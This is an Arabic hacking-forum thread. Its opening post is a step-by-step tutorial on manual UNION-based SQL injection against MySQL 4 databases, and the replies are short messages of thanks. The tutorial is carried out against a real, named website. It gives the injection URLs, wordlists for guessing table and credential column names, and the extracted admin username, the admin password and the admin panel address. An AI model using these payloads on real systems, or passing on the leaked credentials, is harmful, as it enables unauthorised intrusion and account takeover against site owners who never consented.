اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

كيفية التعامل مع الاصدار الرابع في ثغرات الحقن


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 13

الموضوع: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

  1. #1
    :: مشرف عام :: Array الصورة الرمزية QtRoNiX FoX
    تاريخ التسجيل
    Dec 2011
    الدولة
    فلسطين
    المشاركات
    813

    Come كيفية التعامل مع الاصدار الرابع في ثغرات الحقن



    السلام عليكم ورحمة الله وبركاتة

    اول شي مبروك على رجعة الموقع



    طيب موضوعنا اليوم شرح عن كيفية التعامل مع الاصدار الرابع "4" في ثغرات الحقن

    جميعنا نعرف ان الاصدار الرابع في الحقن صعب جدا وكله تخمين بتخمين واذا بدك تستغل يدوي يمكن تزهق حياتك وانتي تخمن
    لذالك الالغلب اصبح يستخدم البرامج للاستغلال
    والبعض او عشاق ثغرات الحقن الي بستغلو يدوي بحبو يعرفو طريقه التعامل مع هذا الاصدار (الاصدار الرابع)
    والان ساشرح الطريقه + تطبيق على موقع

    نبدء على بركة الله..

    الموقع الذي سنطبق عليه الشرح عدد اعمدتة 3 وايضا العامود المصاب هو الثالث فقط


    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3--

    نحذف رقم 3 ونضع بداله كلمة version() لمعرفة اصدار القاعدة ,, يعني يصير الامر هكذا..

    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,version()--

    ظهر معنى الاصدار الرابع " 4.1.22-log "

    الان نضيف عليها الامر +from يعني يصبح الرابط هكذا.
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from--


    ونجرب نضيف احد هذة الكلمات ( تابع اسا بتفهم كل شي .. )

    member
    admin
    user
    users
    accounts
    std_users
    myuser
    sys_user
    mysql.db ++user
    main
    sf_user
    tt_user
    mo_user
    mos_user
    login
    mysql.user
    mysql.users
    admin_login
    jos_users
    jos_session
    wp_users
    bg_users
    usuarios
    login_username
    user_login
    admin_sections


    نجربهن ونشوف اي وحدي منهن الصحيحه

    ما هذة الكلمات ؟؟ لماذا!؟
    هذة الكلمات هي من الممكن ان تكون اسم الجدول الي يوجد بداخله اليوزر والباسورد
    يعني هذه الكلمات هي اسماء الجداول الي فيها ملف اليوزر والباسورد (ممكن يكونو هني وممكن لا )

    ولكن كيف سأعرف ان هذا اسم الجدول صحيح ام غير صحيح ؟؟
    على سبيل المثال عندما تضع كلمة member او اي كلمة موجودة بالاعلى..

    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+member--

    اذا ظهر معك خطء ورجعت الصفحة خربت من هنا اعرف ان هذة الكلمه غير صحيحه وما في منو هاد الجدول ,,, حاول تجرب على كلمة ثانيه
    واذا لم يظهر معك الخطء ولم يتغير شي بالصفحة فهذا هو الجدول الي بداخله يوجد ملف اليوزر والباسورد

    وبالموقع الي منطبق عليه زبطت معنا كلمة users يعني هيك يصير الرابط
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+users--


    احنا هيك تخطينا اول خطوة من التخمين وضل علينا نخمن اسم ملف اليوزر واسم ملف الباسورد

    لكن كيف ستحدث هذة؟؟
    نحن قلنا ان العامود المصاب هو العامود الثالث يعني التخمين رح يكون على العامود الثالث

    لتخمين اليوزر


    login
    user
    username
    users
    username
    user_name
    admin
    adminlogin
    loginmember
    membername
    admin_lastname
    lastname
    fristname
    uname
    name
    +user_login
    aid
    id
    user_sections
    user_username
    user_id
    user_first_name

    ----------------
    لتخمين الباسورد


    userPass
    password
    admin_password
    pass
    passwd
    pwd
    user_pass
    user_password



    وعلى الموقع الي منطبق عليه زبط معنا username,password
    يعني لو بدنا نطلع اليوزر منحط بدل الرقم 3 "username" ..يصير الرابط هيك..
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,username+from+users--

    طيب حلوو طلع لنا اليوزرنيم:- admin

    الان نطلع الباسورد ,, نستبدل كلمة username بكلمة password يعني الرابط بصير هيك
    كود:
    http://www.lawchart.com/index.php?id=-3+union+select+1,2,password+from+users--

    تمام طلع لنا الباسورد:- [email protected]r.ps



    والان تفضلو اليوزر والباسورد ولوحة تحكم الموقع


    http://www.lawchart.com/admin/

    user: admin
    pass: [email protected]




    اتمنى ان اكون قد افدتكم وساعدتكم ولو بشيء بسيط
    تحياتي
    اخوكم QtRoNiX FoX

    التعديل الأخير تم بواسطة QtRoNiX FoX ; 12-22-2012 الساعة 10:43 PM


  2. #2
    هكر مجتهد Array الصورة الرمزية salah.x
    تاريخ التسجيل
    Dec 2010
    الدولة
    الجزاـــــ ئــــر
    المشاركات
    279

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    شكرا لك
    مميز والله
    تقبل مروري المتواضع
    سأترك الوحة للاعظاء المبتدئين
    نريد انكس جميل اوك
    تقبل مروري المتواضع اخي
    بارك الله فيك
    ومبروووووك عودة الموقع


  3. #3
    هكر مجتهد Array الصورة الرمزية salah.x
    تاريخ التسجيل
    Dec 2010
    الدولة
    الجزاـــــ ئــــر
    المشاركات
    279

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    +تم التقييم
    لاتحرمنا جديدك اخي



  4. #4
    :: مشرف عام :: Array الصورة الرمزية QtRoNiX FoX
    تاريخ التسجيل
    Dec 2011
    الدولة
    فلسطين
    المشاركات
    813

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    اهلين اخي صلاح ولا تحرمنا من طلاتك

    بالتوفيق

    التعديل الأخير تم بواسطة QtRoNiX FoX ; 08-21-2012 الساعة 03:27 PM

  5. #5
    هكر مجتهد Array الصورة الرمزية salah.x
    تاريخ التسجيل
    Dec 2010
    الدولة
    الجزاـــــ ئــــر
    المشاركات
    279

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    شكرا لك اخي
    هاذا شرف الي


  6. #6
    هكر مجتهد Array الصورة الرمزية HaCKer011
    تاريخ التسجيل
    Sep 2011
    المشاركات
    474

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكووور عالشرح الجميل
    لا تحرمنا من جديدك



  7. #7
    هكر مبتديء Array الصورة الرمزية كريتوس2013
    تاريخ التسجيل
    Aug 2012
    المشاركات
    66

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    تحيااااااااتي لك


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2012
    المشاركات
    5

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    والله العظيم اني كنت مستصعب الثغره هاي كلها بس والله فهمتها من درسك
    يا اخي عنجد شكرا الك شكرا جزيلا
    ولا تحرمنا جديدك


  9. #9
    هكر متألق Array الصورة الرمزية سارة الغامدي
    تاريخ التسجيل
    Jan 2012
    المشاركات
    6,473

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكؤؤر
    يعطيك العآفية



  10. #10
    هكر مجتهد Array الصورة الرمزية boss-m
    تاريخ التسجيل
    Aug 2012
    الدولة
    سوريا
    المشاركات
    477

    افتراضي رد: كيفية التعامل مع الاصدار الرابع في ثغرات الحقن

    مشكووور يا بطل ♥


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. الدرس الخامس : حقن الاصدار الرابع ... استخراج اليوزر والباس
    بواسطة e . V . E . L في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 7
    آخر مشاركة: 10-16-2011, 09:00 AM
  2. درس الاحتراف في sql مع حقن الاصدار الرابع
    بواسطة Dr.BiLLi.HaCkEr في المنتدى منتدى إختراق المنتديات
    مشاركات: 12
    آخر مشاركة: 10-16-2011, 02:30 AM
  3. مشاركات: 10
    آخر مشاركة: 02-03-2011, 06:55 PM
  4. كيفية التعامل بين المشرف/ـه والعضو/ـه ؟! هام جـــــدا
    بواسطة OB§CURE في المنتدى المنتدى العام
    مشاركات: 9
    آخر مشاركة: 11-12-2010, 07:47 PM
  5. ادوات البيرل الاصدار الرابع 2010 هنا ....
    بواسطة SQL HEX في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-18-2010, 01:19 PM

وجد الزوار هذه الصفحة بالبحث عن:

ِرح حقن الاصدار 4 sql

طريقة حقن المواقع المصابة بثغرة سيكول الاصدار الرابع

حقن الاصدار الرابع في ثغرات SQL InjectioN

طريقة الحقن اليدوي

كيف التعامل مع ثغرة من نوع sql

طريقة الحقن يدوي

استغلال ثغرة sql الاصدار الرابع بالطريقة اليدوية

تخمين على القاعدة Mysql5 في الحقن اليدوي

كيفة الحقن الثغرة

شرح حقن الاصدار الرابع

ثغرة sql إصدار 4

حقن يدوي سكولالاصدار الرابع 4 في ثغرات الحقنالثغرة sql الإصدار 4شرح تخمين الجداول sqlشرح الحقن اليدوى الاصدار الرابعشرح استغلال ثغرة sql injection إصدار قاعده 4شرح حقن يدوي تخمين الباسورد في ثغرة sqlاستغلال الحقن اليدويكيفية حقن موقع يدويدورة اختراق المواقع من الاصدار 4التعامل بين التخمين مع الاصدار 4 اثناء الحقنشرح طريقة الحقن اليدوي sqlالتخمين على الاصدار 4

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •